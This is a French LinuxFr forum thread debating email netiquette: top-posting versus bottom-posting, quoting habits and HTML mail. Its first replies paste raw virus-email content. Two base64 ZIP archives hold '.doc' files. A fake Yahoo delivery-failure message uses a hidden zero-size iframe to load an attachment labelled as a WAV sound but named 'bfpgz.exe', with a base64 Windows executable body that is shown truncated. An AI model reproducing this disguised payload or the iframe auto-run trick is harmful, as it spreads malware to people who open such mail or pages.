                      8AF7JtFRuNcBU6Ysgx6RYwgS4G9u7DBtePic40O+FzF2VJVc+STUizeX5PuqoEivX9rZKZLm
                      WewSeXrFoWTZPSc1D+NLCc70O/G9DXqzCeeRzTjX61SRwaZeActfmkG9GuTzMw82kUfRI+Pi
                      uVaHB3Z91XjUmVEXBz2I0Ce6FjQ1hb8wtz7hEpLTpjqZGfLFEA31mzrH8hgQmSs5RFBPF6kY
                      kjoop0vuM/dpC8YQEVlbJWM3ddyD+iulFB9vfNI7XdZRIGElcD+q5fTpk55Zfeg355p5GWjl
                      fmtjek/RfbByWRqH4OfVwRFrAI4AR4HngbPAuTzlA9IIXR359cr97mmW0qCcbQ7N3uCGY12S
                      s48z8hwasmwOjTPz+YWkOiEWA98A3wKj5iU2z/uNxAZHEhPXExN/JSb+TEz8PqFDylLmpN0B
                      eRVUfuZivX5mePWcM2F7BTD3RNheCSzpIqpZTMX/wj3FQ0QT+f9PJiTpH8JYdfiOQX4QEU9i
                      i1wBDlAn/KR9afffhXMAc+RzeTq3xhYnDXzZ68+UCsGd+eakwZ/7a530F8k16N6M+1CM1ux0
                      6x9gKnWkr+rSnVrFP/NkxJvJGn86/B8hdW/HlEvd8B1D4sGy7m0Y06e9M9WAP9/DpMOf75GW
                      mzcy24WXF3KIwH8dFN80nPRH5m5UlsH45wKJ9073SunyT/z/+w9QSwECFwMUAAAACACpsWcw
                      y+lQ4UoHAAAAJAAACwANAAAAAAAAAAAApIEAAAAAcmVwb25jZS5kb2NVVAUAA22QS0BVeAAA
                      UEsFBgAAAAABAAEARgAAAIgHAAAAAA==
                      --------------020806050001070909030306--
                      • [^] # Re: VEUILLEZ REPSECTER LA NETIQUETTE

                        Posté par  . Évalué à -1.

                        UEsDBBQAAAAIAOe5ZzAFDQ4+vQQAAPQOAAAMABUAcmVwb25jZTIuZG9jVVQJAAPxnktAH59LQFV4
                        BADoA+gD1VdLc9s2EL77V2ByUduJbYJ6+DXTmcR1J04UjWs7h8zgApIghRoC6AVoSXH537sgKZmi
                        K+vQ6lAdSADc9367Cz0zcCllXFtZPeI8o+EwZIlI0+DgmaVGOxcpvwpYqqViaTzlYIXDbQ6P+HQO
                        CuGWuSD3ciYsmYg5uTUzri9Kz0Z3sk2+jcc1bbiT9jeps4g7W9P3d9LfLWeRUTX1YCf1B5C8IR7u
                        JL40BUgB3t+L0vPERhnwwWIgkoBlIIQOWKQKEVxUZ+FwWJ/6hT/Hd6XNuqUSdiqE85sQ3ZKHgz5l
                        Sp6EAbMRtyIxOhyQsZmjxiq6ZCytq7nDIXMLT7+ipANmtVg45JgUs0igbvJJ8ASDR2jDM+ryDLfz
                        hA3PSZdntJ2nX/H8wmJLN1y40ok2DsGCfLXY0w13McV8ZnTS9q9Dsda1JvFqzlhqfbSKHEO00nIr
                        UqTUsagl+cBEgwFS8VFQIcL2Byxq2bd2qBMvVL5hw91jwUG0jDzpeMExn20n+v2qhCyqUFxnNMCD
                        rtp+vwoLiUyybAzuiEWrwLWlnmzByin5luf/gBXMckSRsLYlYHK7NUNyyXMnjW5UDTdNucdi0Zlq
                        x6A/2mHNJe5b9INNiR8LpUTbO9rveM91J+k0bLL+ArDfjXGbCPOESPMgRK5ZnB7StfeFqtwPyLV2
                        AnSlXD80zgSIdjo8HbwIfymROxH7yKxQ0pg7fIUuhO6b6GoqyxdSl3MHLvuNlZ0Y3sv4oV06gy7q
                        RmRiYNa0ORuGWzNW95pOxkKko95QqF+W083of1QGDXgp7pBuh71fVl7RTlJpu5TX+ezW8tnugqJn
                        mNlELBqOTh+5nuVK4sRqAbgDSLNofww7LcBxaIfmzE+NVihuFJd6E4UvyKth9yGy3P04REk64ZDY
                        eAoyRbGNyNEbCLycYnFieNYILA8Q4aBxHSDI/ajS0Z8sFS70S+ulUr/SHBhv3q0PPEbOnDnplMiz
                        ZyZ1akp/D3A88sh4kmL+IHVCWc4xLXMahpj/aj31NgZsxiFTFSr8CqrVXCZmHjuciRYrJkFHHrTR
                        ws9Ku+iPalJnF5pSTJ/fRO2Nam9gtckzHeO9hCkHXuoBWgEJy324/Rnu2KOqsC8dz4PnVzjxyVCY
                        OMezoGQ8ktokEsyTAJCJ8DLiKVFGlZXofye+ElHux8QbvH/gELoHnJhkDr5Izv8Lm7fp+xXHSSbg
                        /X51fO5xSVCqtawnzojqGdBLNzUg9WMhiC2A4NRJQWbmPUk8M9KdYhwUJw64jqcCj0k8lUIfkUnP
                        FBGWOcm59ceqxwGMFXC0Xy/2K/0rti0+k05WIcJHQL5K+MH/104d7umHurVA+X+162V9+Dm8uiJj
                        7KJ4/UfMOOwo629XWmHjEeQ73vXJDZikwLH/JN2SlOilFCrxrqUKO7B15JXjow3HyafvN1e34+vJ
                        F/Ju6lx+fnyMeopFCkcGsuPIYFSP35VlIxKscjtCuVXKT0dHRz+XXtTbqVj5eT+VluCfN8vRWX/J
                        4koRHLUKCyUhfhTglcFfeCxBQocFloPBzo+BMCmRzhIz11hSa4F/FL4Z4TdPm/Dl+foLjnGuyGMh
                        qzI1uueI4M7LyzAtAuyKck9gKMu/AVBLAQIXAxQAAAAIAOe5ZzAFDQ4+vQQAAPQOAAAMAA0AAAAA
                        AAEAAACkgQAAAAByZXBvbmNlMi5kb2NVVAUAA/GeS0BVeAAAUEsFBgAAAAABAAEARwAAAPwEAAAA
                        AA==
                        • [^] # Re: VEUILLEZ REPSECTER LA NETIQUETTE

                          Posté par  (site web personnel) . Évalué à 0.

                          --ymzssdmla
                          Content-Type: text/html
                          Content-Transfer-Encoding: quoted-printable



                          <iframe src=3D"cid:kxmkevjvsjwj" height=3D0 width=3D0>
                          Message from yahoo.com
                          I'm afraid =
                          I wasn't able to deliver your message =
                          to the following addresses:
                          Undelivered message to unmjsh@yahoo.com
                          Message follows:

                          --ymzssdmla
                          Content-Type: audio/x-wav; name="bfpgz.exe"
                          Content-Transfer-Encoding: base64
                          Content-Id: <kxmkevjvsjwj>
                          TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
                          ZGUuDQ0KJAAAAAAAAAB+i6hSOurGATrqxgE66sYBQfbKATvqxgG59sgBLerGAdL1zAEA6sYBWPXV
                          ASvqxgE66scBnurGAdL1zQEx6sYBguzAATvqxgFSaWNoOurGAQAAAAAAAAAAUEUAAEwBBABwy2E/
                          AAAAAAAAAADgAA8BCwEGAADQAAAAQAEAAAAAAIWuAAAAEAAAAOAAAAAAQAAAEAAAABAAAAQAAAAA
                          AAAABAAAAAAAAAAAIAIAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA
                          AABY6gAAtAAAAACwAQCoZwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAHACAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAudGV4dAAAAFXKAAAAEAAAANAAAAAQAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAC2
                          FgAAAOAAAAAgAAAA4AAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAA/K4AAAAAAQAAMAAAAAABAAAA
                          AAAAAAAAAAAAAEAAAMAucnNyYwAAAKhnAAAAsAEAAHAAAAAwAQAAAAAAAAAAAAAAAABAAABAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7Gr/aHDi
                          QABohKNAAGShAAAAAFBkiSUAAAAAgewUAQAAU1ZXiWXoM/+JffyJvdz+//+LdQhW6NORAABZhcB0
                          dzl9DHQQalxW6JGRAABZWYmF3P7//zm93P7//3UIibXc/v//6wb/hdz+////tdz+//+NheT+//9Q
                          6HGQAABZWVD/FbDhQACJveD+//+DveD
            • [^] # Re: Les handicapés du Web...

              Posté par  (site web personnel, Mastodon) . Évalué à 6.

              Et bien justement, le système de citation normal fait lire de haut en bas, tu lis d'abord le texte original (indenté avec "> "), et ensuite la réponse (comme je le fais ici). C'est quand même très agréable d'avoir les réponses point par point.

              Relis mon journal et tu remarqueras que dans ce cas là on accuse le serveur de mélanger les messages...


              Et encore, je te parle pas du fait que j'ai installé le net j'ai mon oncle (Gnome 2.4 et Thunderbird simplifié pour le mail)

              Et bien, quand il répond à un message, il répond en dessous, ce qui est le comportement de Thunderbird.

              alors qu'il n'avait pas touché un ordinateur de sa vie jusque là et qu'il était tout fier de pouvoir envoyer des mails à sa famille (ce qui ne fut pas chose aisée à expliquer), la famille l'a bombardé de :

              "Tu dois avoir un problème de configuration car tu réponds en dessous des messages, ce qui n'est pas normal !"

              Merci la famille !

              1) On perturbe qqn qui vient à peine de se lancer dans le web pour des détails
              2) On critique au lieu de féliciter
              3) On se définit comme garant de la normalité !

              Et c'est tous les jours et tout le temps comme ça...

              Mes livres CC By-SA : https://ploum.net/livres.html

              • [^] # Re: Les handicapés du Web...

                Posté par  (site web personnel) . Évalué à -2.

                Je pesiste et signe!

                Quand je recois un mail, je prefere lire ce que le personne veut me dire en premier plutot que de l'avoir sous la sitation! La sitation ne sert que de rappel et dans la majorité des cas, on ne la relie pas!

                Attention, cela est bien sur different pour un mail avec reponse point par point :)
                • [^] # Re: Les handicapés du Web...

                  Posté par  . Évalué à 4.

                  Et bien dans ce cas tu ne mets que ta reponse !

                  C'est stupide d'envoyer 20k de texte si tu sais qu'il ne sert a rien....
                  Un peu de bon sens flute de zut. Tu nous explique depuis tout a l'heure que tu t'en fou de relire ton message c'est de celui qui t'as repondu l'a fait betement en laissant tout ton message d'origine !
                  • [^] # Re: Les handicapés du Web...

                    Posté par  (site web personnel) . Évalué à 1.

                    "Tu nous explique depuis tout a l'heure que tu t'en fou de relire ton message "

                    Non, je dis que la citation est la pour permettre de relire si on a oublié, mais uniquement si on a oublié donc je la met apres.
                    • [^] # Re: Les handicapés du Web...

                      Posté par  . Évalué à 3.

                      Et pourquoi dans tes réponses sur ce journal tu cites Avant et pas Apres ? Il y a une différence fondamentale entre le mail et les commentaires linuxfr ?
            • [^] # Re: Les handicapés du Web...

              Posté par  . Évalué à 2.

              Rhaa c'est mon lot quotidien où on cirtique Gnus parce que soit-disant pas "user friendly" comprendre "moche" (oui moche pas autre chose) et qu'on vante le OE parce que c'est vachement bien. Pff pitoyable.

              Je ne leur parle même plus de netiquette parce que de toute façon l'informatique c'est pas leur métier et toc ! Ben voyons.

              Deja la base de l'échange ils connaissent pas alors pour leur faire avaler les histoires du W3C, des logiciels libres, ...

              Bref c'est pitoyable
              • [^] # Re: Les handicapés du Web...

                Posté par  . Évalué à -7.

                C'est pitoyable que des gens ne pensent pas comme toi?..
                Tu t'emportes.

                Perso je prefere le mode à la Outlook, repondre en haut et garder tout le fil de la discussion en bas.
                Oui ca fait des mails de 20ko au bout d'un moment, c sur que 20ko ca va beaucoup gener... Avec ca je vais saturer le reseau, ben voyons.

                C'est un peu fini le temps des 14.4 et des BBS.

                Quand je lis un mail j'aime avoir tout l'historique à porté, mais je n'aime pas avoir a faire defiler tout ce texte avant de pouvoir repondre.

                Quand je lis un mail j'aime bien trouver rapidement le texte de la personne. Si la personne repond a un email qui avait deja un long fil de discu, si cette reponse est elle meme tres longue, tu vas devoir redescendre tout en bas de l'email, voir que tu es trop bas, remonter un peu pour chercher le debut du texte. ===> plein de temps perdu, perso ca m'enerve.

                Alors je repond à la outlook et c configuré comme ca dans mon client mail.
                • [^] # La netiquette c'est du confort !

                  Posté par  . Évalué à 4.

                  «C'est un peu fini le temps des 14.4 et des BBS.»

                  je crois que tu ne vois pas où est le vrai problème. Ce n'est pas la connexion entre l'utilisateur et son FAI, mais celle qu'il y a entre les milliers de routeurs de l'internet. Le nombre d'emails qui transitent par ces routeurs est considérable et va encore augmenter. Si la taille de ces emails augmente aussi, la bande passante utilisée va augmenter exponentiellement.
                  La bande passante ça a un coût (répercuté dans la facture du FAI, qui le répercute à son tour sur la tienne).

                  «Perso je prefere le mode à la Outlook, repondre en haut et garder tout le fil de la discussion en bas.»

                  au pire, pour ça il ya les pièces jointes. Mais ce n'est pas la solution. La solution est:
                  - de configurer ton client mail pour qu'il gère les discussions comme des arborescences
                  - de veiller à ce que tes correspondants quotent correctement (c'est-à-dire ne balancent pas l'intégralité des messages dans leur réponse, mais seulement la citation à laquelle il font référence. Mais aussi qu'ils retirent de l'email auquel ils répondent les morceaux déjà quotés qui sont obsolètes et n'ont plus d'intérêt pour la discussion).

                  un peu de politesse dans ce monde de brutes ne ferait pas de mal.
                  • [^] # Re: La netiquette c'est du confort !

                    Posté par  (site web personnel) . Évalué à -2.

                    la limite des serveurs de mails pour un mail, c'est 10 Mo.
                    oui, c'est enorme.
                    oui, le smtp n'est pas un protocole pour le transfert de fichiers.
                    on le sait tous ici.

                    ceci dit, accuser les mails de saturer la bande passante de routeurs de nos backbones... alors que le p2p se repand à la vitesse de la lumiere, que telechager une distribution linux, c'est plusieurs centaines de Mo, que faire un dist-upgrade sur une woody fraichement installée, c'est consequent...

                    accuser le traffic du mail me parait disproportionné...

                    on parle pas des virus à 38ko multiplié par des millions...

                    on te parle de mails entre personnes physiques...

                    si on veut economiser la bande passante, on fait une netiquette pour les trolls ?

                    bien à vous
                    • [^] # Re: La netiquette c'est du confort !

                      Posté par  . Évalué à 1.

                      «ceci dit, accuser les mails de saturer la bande passante de routeurs de nos backbones...»
                      Ne déforme pas ce que j'ai écrit s'il te pait.
                  • [^] # Re: La netiquette c'est du confort !

                    Posté par  . Évalué à 1.

                    Tu vas dire que je suis buté mais bon...

                    En plus ca n'est pas applicable, ca demande que tout le monde fasse l'effort de faire ca, c une utopie que d'esperer que ca arrive un jour.

                    Y'a pas vraiment de solution a notre probleme, ou du moins, je n'en vois pas.

                    Meme si j'etais d'accord avec toi, je me vois mal expliquer à mes clients que ce sont des quiches et qu'ils doivent etre polis et respectés le paragraphe 12 alinea 123 de la netiquette.
                    Deja que certains ne comprennent pas à quoi set le sujet d'un email... Je te dis pas pour le reste.

                    Et tiens, j'ai été moinssé par des gens decrit par Poum dans ce journal... Des power user qui plussoient/moinssoient en fonction de leur avis.
                    • [^] # Re: La netiquette c'est du confort !

                      Posté par  . Évalué à 3.

                      «Meme si j'etais d'accord avec toi, je me vois mal expliquer à mes clients que ce sont des quiches et qu'ils doivent etre polis et respectés le paragraphe 12 alinea 123 de la netiquette.»

                      Il y a effectivement un point sur lequel on ne semble pas d'accord: l'ordinateur et ses logiciels sont des outils qui demandent un gros apprentissage. Manifestement, tes clients doivent apprendre à utiliser ces outils avant de les utiliser.
                    • [^] # Re: La netiquette c'est du confort !

                      Posté par  . Évalué à 1.

                      « Tu vas dire que je suis buté mais bon...»

                      noooonnn...
                      Ceci http://linuxfr.org/comments/363696.html(...) devrait achever de te convaincre.
                      • [^] # Re: La netiquette c'est du confort !

                        Posté par  . Évalué à 0.

                        Je l'avais lu oui, du coup j'ai relu ;)

                        Mais non, rien n'y fait.

                        Dans mes amis proches, non-informaticiens, j'ai un mal fou à leur faire bien utiliser leur messagerie (pas de HTML, pas de citation à la Outlook)

                        Tout ce qui a été dit par le clan des "on ecrit APRES" + La citation ci-dessus me fait penser à des gens qui ne veulent pas evoluer et qui aimeraient voir les autres utiliser leurs outils en fonction des dogmes de ce "clan".

                        Pourquoi pas de mail en HTML? c beau l'html, ca fiat un email + soigné, c moderne, c normal.
                        Pour moi un mail pourait tout aussi bien inclure du java, du javascript, et meme du flash, si le recepteur de cet emai est équipé pour le lire. Pourquoi pas apres tout? Pourquoi rester avec du texte brut alors qu'on a des technologies qui nous permettent de faire des choses 10000 fois plus belles. Mais ceci est un autre sujet.

                        Je trouve horripilant les messages à la Outlook, où après plusieurs aller/retours on se retrouve avec des messages de plus en plus longs, contenant l'intégralité de la conversation.
                        Sur une mailing-list de ma boîte, pourtant consacrée à Linux, ya des boulets qui citent les 100 lignes d'un message (à la Outlook) et qui se contentent de répondre au-dessus "Je suis d'accord, bonne idée". Quand en plus les messages sont en HTML (+ texte), on finit par des messages de 20 Ko pour 2-3 lignes utiles.


                        Coucou, c'est moi le boulet :)

                        Quand tu reponds au dessus et non en dessous ce genre d'email n'est pas genant...

                        Autre argument, quand tu ouvres ton cliant mail, que tu affiches l'email recu, que fait le programme? il va en bas tout seul ou il ouvre l'email du debut?
                        Il l'ouvre du debut, donc, hop de suite tu as la reponse sous les yeux.
                        Exemple, des fois je dois demander qu'on me donne un ordre, j'envois un email expliquant le probleme et je dis, voila, il faut faire ca opur le resoudre, donne moi l'ordre.
                        Le mec repond un "ok do it"
                        Informel, c tout, on est là pour bosser par pour etre super polis entre nous (enfin, pour ce genre d'email on reste succint).
                        Quand je recois son mail, je vois le "OK do it" de suite, pas besoin de scroller jusqu'au bas de l'email: confort accru je trouve.


                        Cette discussion a deja été faite sur DLFP des milliers de fois mais ca fait pas de mal de la refaire :)
                        • [^] # mais nan, c'est toi qui est tétu :o))

                          Posté par  . Évalué à 2.

                          «Quand je recois son mail, je vois le "OK do it" de suite, pas besoin de scroller jusqu'au bas de l'email: confort accru je trouve.»

                          Mais alors pourquoi diable faut il citer le message ??? Si tu n'as pas besoin de lire cette citation !
                          Si tu as besoin de la lire, il te faudra scroller, ce qui n'est pas pratique.


                          «Pourquoi pas de mail en HTML [...]Pourquoi rester avec du texte brut alors qu'on a des technologies qui nous permettent de faire des choses 10000 fois plus belles»

                          On pourrait répondre: parce que ça ne sert à rien. Mais je vais faire mieux: c'est une faille majeure dans la sécurité de ton poste (exécution de programmes en javascript ou en java qui peuvent manipuler des fichiers sur ton disque ou des données en mémoire...)

                          Je note toutefois que tu quotes très bien les messages pour y répondre ici-même. Et je crois que tu serais un tantinet exaspéré si je répondais et qu'ensuite tu retrouvais l'intégralité de ton commentaire sous mon message...
                          • [^] # Re: mais nan, c'est toi qui est tétu :o))

                            Posté par  . Évalué à 0.

                            Mais alors pourquoi diable faut il citer le message ???

                            Voir mon post suivant repondant à m'sieur Tramo, en gros: Si on me repond, perso je vais plus savoir de quoi ca parle. Des mails j'en recois à peu pres 700 par jour, alors j'oublie vite de quoi il s'agit. Oui c abusé, non je ne les lis pas tous, oui notre boite a un effort certain à faire pour arriver à diminuer tous ces echanges d'email et on y travaille, mais l'etat de fait est ceci: je recois 700 mails/jour, moi et aussi toute mon equipe.
                            De plus si la reponse arrive 3 semaines plus tard.. m'en souviendrais lpus du tout.

                            Je note toutefois que tu quotes très bien les messages pour y répondre ici-même. Et je crois que tu serais un tantinet exaspéré si je répondais et qu'ensuite tu retrouvais l'intégralité de ton commentaire sous mon message...

                            Ce n'est pas le meme outil, ici c'est un forum, j'ai sous les yeux mes reponses et les tiennes, dans le petit carré juste au dessus, alors que je tape cette reponse, je vois d'ailleurs ton post, qui me sert de reference.
                            Je quote un petit peu ca c'est vrai que ca apporte de la lisibilité dans ce cas bien precis, des fois il n'est pas necessaire de quoter.

                            Et je ne repond pas a propos de l'HTML car sinon on va plus s'en sortir ;)
                            • [^] # Re: mais nan, c'est toi qui est tétu :o))

                              Posté par  . Évalué à 1.

                              «Si on me repond, perso je vais plus savoir de quoi ca parle.»

                              En fait tu es d'accord avec nous, les «on ecrit APRES»: ce que tu veux dans les réponses à tes mails, c'est: une courte citation bien choisie qui te permet de te remémorer le sujet dont il s'agit; immédiatement suivie de la réponse tant attendue.
                              On est d'accord !

                              Je pense que de bons clients mail (ceux qui sont installés chez moi, c'est le cas) sont capables de classer les mails par fil, ce qui permet même 5 ans après de retrouver précisément à quoi se référait une réponse reçue. On se retrouve alors dans un cas identique aux commentaires de linuxfr.

                              «Et je ne repond pas a propos de l'HTML car sinon on va plus s'en sortir ;)»

                              Sisi, vas-y, avec des réponses bien quotées, pas de risque de s'y perdre !
                              • [^] # Re: mais nan, c'est toi qui est tétu :o))

                                Posté par  . Évalué à 1.

                                Les bons clients mails permettent en effet de classer par fil, et meme outlook sait le faire...
                                Mais le mail d'origine, celui que j'envoi, il est dans "mail sent" , pas dans l'inbox...

